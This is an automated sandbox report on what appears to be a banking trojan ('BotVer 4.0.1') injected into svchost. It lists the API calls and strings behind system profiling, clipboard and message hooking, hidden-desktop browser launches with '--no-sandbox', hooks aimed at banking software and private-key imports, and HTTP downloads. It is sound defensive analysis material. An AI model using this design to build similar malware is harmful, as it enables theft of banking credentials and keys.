• CloseHandle.KERNEL32(00000000), ref: 02C86047
• CreateThread.KERNEL32(00000000,00000000,02C902E0,00000000,00000000,00000000), ref: 02C8605C
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86070
• CloseHandle.KERNEL32(00000000), ref: 02C8607D
• CreateThread.KERNEL32(00000000,00000000,02C77110,00000000,00000000,00000000), ref: 02C86092
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C860AA
• CloseHandle.KERNEL32(00000000), ref: 02C860BF
• StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02C860D6
• StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02C860EC
• StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02C860FE
• StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02C86110
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02C86122
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\core.exe), ref: 02C86134
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02C86146
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02C86158
                                                                                                                                                                                                              • Part of subcall function 02C844F0: memset.MSVCRT ref: 02C84511
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7556F550,75497390,75570A60), ref: 02C84527
                                                                                                                                                                                                              • Part of subcall function 02C844F0: AddVectoredExceptionHandler.KERNEL32(00000001,02C73940), ref: 02C84534
                                                                                                                                                                                                              • Part of subcall function 02C844F0: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C8454F
                                                                                                                                                                                                              • Part of subcall function 02C844F0: CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C84569
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetHandleInformation.KERNEL32(00000000,?), ref: 02C84581
                                                                                                                                                                                                              • Part of subcall function 02C844F0: CloseHandle.KERNEL32(00000000), ref: 02C84592
                                                                                                                                                                                                              • Part of subcall function 02C844F0: InitializeCriticalSection.KERNEL32(02CBD870), ref: 02C845A3
                                                                                                                                                                                                              • Part of subcall function 02C844F0: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845B9
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02C845CB
                                                                                                                                                                                                              • Part of subcall function 02C844F0: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845EA
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02C845F8
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02C84614
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02C84630
                                                                                                                                                                                                              • Part of subcall function 02C76FB0: GetCurrentProcessId.KERNEL32 ref: 02C76FB9
                                                                                                                                                                                                              • Part of subcall function 02C76FB0: GetCurrentThreadId.KERNEL32 ref: 02C76FC8
                                                                                                                                                                                                              • Part of subcall function 02C76FB0: GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C76FE1
                                                                                                                                                                                                              • Part of subcall function 02C76FB0: GetUserObjectInformationA.USER32(00000000), ref: 02C76FE8
                                                                                                                                                                                                              • Part of subcall function 02C76FB0: lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C76FFE
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\opera.exe,00000000), ref: 02C86183
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,RtlFreeHeap,02C84010,02CC7D38), ref: 02C8619D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C861A0
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C861B4
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02C861D1
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C861E0
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,00000000), ref: 02C861F9
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02C86200
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C86216
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C7ACD0,00000000,00000000,00000000), ref: 02C8622A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8623E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8624B
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C77020,00000000,00000000,00000000), ref: 02C86260
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86274
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C86281
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Thread$CreateInformation$Close$AddressHeapProcProcess$Current$ModuleUsermemset$CriticalInitializeMutexPathSection$AdminBackslashCommandDesktopFileLibraryLineLoadNameObjectOpenQueryValueVolume_snprintflstrcmpi$AllocDirectoryEnvironmentExceptionFolderFreeHandlerSystemValidateVariableVectoredWindowslstrcpyn
                                                                                                                                                                                                            • String ID: --no-sandbox$ --no-sandbox$92F35C4Ca$92F35F00a$92f35800a$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 196 2c74920-2c74a59 CreateFileA 197 2c74fe4-2c74fe9 196->197 198 2c74a5f-2c74aca WriteFile * 3 GetModuleFileNameA WriteFile 196->198 199 2c74ad0-2c74ad5 198->199 199->199 200 2c74ad7-2c74b2a WriteFile * 2 GetUserNameA WriteFile 199->200 201 2c74b30-2c74b35 200->201 201->201 202 2c74b37-2c74b8d WriteFile * 2 GetEnvironmentVariableA WriteFile 201->202 203 2c74b90-2c74b95 202->203 203->203 204 2c74b97-2c74bdf WriteFile * 2 GetSystemDefaultLangID memset 203->204 205 2c74be1-2c74beb 204->205 206 2c74bf5-2c74c0b 205->206 207 2c74bed-2c74bf1 205->207 208 2c74c11-2c74c1a 206->208 207->205 209 2c74bf3 207->209 210 2c74c20-2c74c25 208->210 209->208 210->210 211 2c74c27-2c74c29 210->211 212 2c74c35-2c74c4d WriteFile 211->212 213 2c74c2b 211->213 214 2c74c50-2c74c55 212->214 213->212 214->214 215 2c74c57-2c74cd2 WriteFile * 2 GetDC GetDeviceCaps GetSystemMetrics * 2 _snprintf WriteFile 214->215 216 2c74cd5-2c74cda 215->216 216->216 217 2c74cdc-2c74d3c WriteFile * 2 GetDateFormatA WriteFile 216->217 218 2c74d40-2c74d45 217->218 218->218 219 2c74d47-2c74da4 WriteFile * 2 GetTimeFormatA WriteFile 218->219 220 2c74da7-2c74dac 219->220 220->220 221 2c74dae-2c74e5e WriteFile * 2 GetTimeZoneInformation _snprintf WriteFile 220->221 222 2c74e61-2c74e66 221->222 222->222 223 2c74e68-2c74ea9 WriteFile * 3 call 2c74070 222->223 226 2c74eb0-2c74eb5 223->226 226->226 227 2c74eb7-2c74f0d call 2c74070 WriteFile * 2 GetSystemWindowsDirectoryA WriteFile 226->227 230 2c74f10-2c74f15 227->230 230->230 231 2c74f17-2c74f5d WriteFile * 3 IsUserAnAdmin 230->231 232 2c74f64 231->232 233 2c74f5f 231->233 234 2c74f67-2c74f6c 232->234 233->232 234->234 235 2c74f6e-2c74f80 IsUserAnAdmin 234->235 236 2c74f87-2c74fbb WriteFile * 2 call 2c747e0 call 2c740f0 call 2c743e0 call 2c74630 
235->236 237 2c74f82 235->237 245 2c74fc0-2c74fc6 236->245 237->236 245->197 246 2c74fc8-2c74fd5 GetHandleInformation 245->246 246->197 247 2c74fd7-2c74fdb 246->247 247->197 248 2c74fdd-2c74fde CloseHandle 247->248 248->197
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,75495CE0), ref: 02C74A4E
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02C73EFD,00000000,02CCB0C4), ref: 02C74A76
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,4.0.1,00000005,02C73EFD,00000000), ref: 02C74A88
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74A9A
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C74AA9
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Process: ,0000000A,02C73EFD,00000000), ref: 02C74ABF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74AEA
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74AFC
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 02C74B09
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Username: ,0000000B,02C73EFD,00000000), ref: 02C74B1F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74B4A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74B5C
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02C74B6F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,02C73EFD,00000000), ref: 02C74B85
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74BAA
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74BBC
                                                                                                                                                                                                            • GetSystemDefaultLangID.KERNEL32 ref: 02C74BBE
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C74BD7
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Language: ,0000000B,02C73EFD,00000000), ref: 02C74C45
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74C6A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74C7C
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02C74C81
                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 02C74C88
                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 02C74C91
                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 02C74C99
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C74CB1
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Screen: ,00000009,02C73EFD,00000000), ref: 02C74CCA
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74CEF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74D01
                                                                                                                                                                                                            • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02C74D1B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Date: ,00000007,02C73EFD,00000000), ref: 02C74D31
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74D5A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74D6C
                                                                                                                                                                                                            • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02C74D86
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,02C73EFD,00000000), ref: 02C74D9C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74DC1
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74DD3
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?), ref: 02C74DDC
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C74E3D
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{GMT: ,00000006,02C73EFD,00000000), ref: 02C74E56
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74E7B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74E8D
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,02C73EFD,00000000), ref: 02C74E9F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,02C73EFD,00000000), ref: 02C74ECF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74EE1
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C74EEF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,?,00000000), ref: 02C74F05
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02C74F2A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74F3C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,?,00000000), ref: 02C74F4E
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C74F50
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C74F73
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,true,02C73EFD,?,00000000), ref: 02C74F95
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74FA7
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,02C73EFD,00000000,00000000), ref: 02C74FCD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C74FDE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Write$System$User$AdminFormatHandleInformationMetricsNameTime_snprintf$CapsCloseCreateDateDefaultDeviceDirectoryEnvironmentLangModuleVariableWindowsZonememset
                                                                                                                                                                                                            • String ID: %c%d:%02d$%dx%d@%d$4.0.1$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                            • API String ID: 113499719-3279427369
                                                                                                                                                                                                            • Opcode ID: 9054499f4fa11f2e0f0240a636c2edd1570574cf3f9fc0559508981e89958fbe
                                                                                                                                                                                                            • Instruction ID: b2fa6146e9022246d4178943fe94a64be024fc2ff43f79197264d154892d7f77
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9054499f4fa11f2e0f0240a636c2edd1570574cf3f9fc0559508981e89958fbe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D226DB1D40218FEEB16DFA4CC89EEEBB7DEF45700F10459AB246A7141E6B45B48CB60

Control-flow Graph

[Control-flow graph, entry block 2c844f0; graph rendering not preserved]
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C84511
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7556F550,75497390,75570A60), ref: 02C84527
                                                                                                                                                                                                            • AddVectoredExceptionHandler.KERNEL32(00000001,02C73940), ref: 02C84534
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C8454F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C84569
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C84581
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C84592
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02CBD870), ref: 02C845A3
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845B9
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02C845CB
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845EA
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02C845F8
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02C84614
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02C84630
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02CBD858), ref: 02C8464B
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02C84652
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02C84662
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,02C76A30,02CC7BA8), ref: 02C84678
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C84693
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C846A8
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02C846AF
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C846C1
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C846DB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02C846EB
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,02C7ABD0,02CBCC94), ref: 02C84701
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C84710
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C84725
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02C8472C
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C8473E
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,java), ref: 02C84772
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.exe), ref: 02C84784
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02C8479D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02C847AB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02C847C7
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02C847E3
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02CBD840), ref: 02C847FE
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02C8482B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02C84837
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02C84856
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02C84862
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02C84881
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02C8488D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                            • String ID: .exe$92f35800a$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                            • API String ID: 1248150503-4075828536
                                                                                                                                                                                                            • Opcode ID: 3e045128c3dfa6dc7d30af0499c5a6ae0fd0e9991d34ddc30372aca257b1a052
                                                                                                                                                                                                            • Instruction ID: 30f4eea14a0cac2fd906ffe96af7effc306e659fab77b5ce78b910cc3d23f5b5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e045128c3dfa6dc7d30af0499c5a6ae0fd0e9991d34ddc30372aca257b1a052
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9591A071BC035676FA2677B09C4AF9A676D9F80F49F1186A0F502F3080DBA5E6018A79

Control-flow Graph

[Control-flow graph, entry block 2c839c0; graph rendering not preserved]
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C839F2
                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83B0B
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83B1A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C83B38
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C83B50
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,02C76406,?), ref: 02C83B5F
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,?), ref: 02C83B7F
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83BB3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83BD7
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C83BDA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83BF2
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02C83C0F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C83C30
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C39
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83C3C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C49
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83C4C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C5A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83C5D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C6A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83C6D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C83C83
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C83C94
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 02C83B05
                                                                                                                                                                                                            • HTTP/1.0, xrefs: 02C83ACD
                                                                                                                                                                                                            • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C83B27
                                                                                                                                                                                                            • Referer: http://www.google.com, xrefs: 02C83B14
                                                                                                                                                                                                            • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C83A79
                                                                                                                                                                                                            • 3abfb9076ff185e9, xrefs: 02C83B22
                                                                                                                                                                                                            • POST, xrefs: 02C83ABD, 02C83AD3
                                                                                                                                                                                                            • GET, xrefs: 02C83AB6
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Control-flow Graph (graph image not preserved in this extract; nodes are marked Executed or Not Executed; first block at 02C73940)
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C739EC
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C73A17
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C73A3E
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02C73A9F
                                                                                                                                                                                                            • SymSetOptions.DBGHELP(00000006), ref: 02C73AB4
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02C73AC4
                                                                                                                                                                                                            • SymInitialize.DBGHELP(00000000), ref: 02C73AC7
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 02C73B05
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02C73B90
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C73BAE
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C73C44
                                                                                                                                                                                                            • ZwQueryInformationThread.NTDLL(00000000), ref: 02C73C4B
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 02C73C88
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • HH;mm;ss, xrefs: 02C73E12
                                                                                                                                                                                                            • debug_%s_%s.log, xrefs: 02C73E34
                                                                                                                                                                                                            • dd;MMM;yyyy, xrefs: 02C73DED
                                                                                                                                                                                                            • sysinfo.log, xrefs: 02C73ED8
                                                                                                                                                                                                            • ThreadStart = , xrefs: 02C73C60
                                                                                                                                                                                                            • csm, xrefs: 02C73965
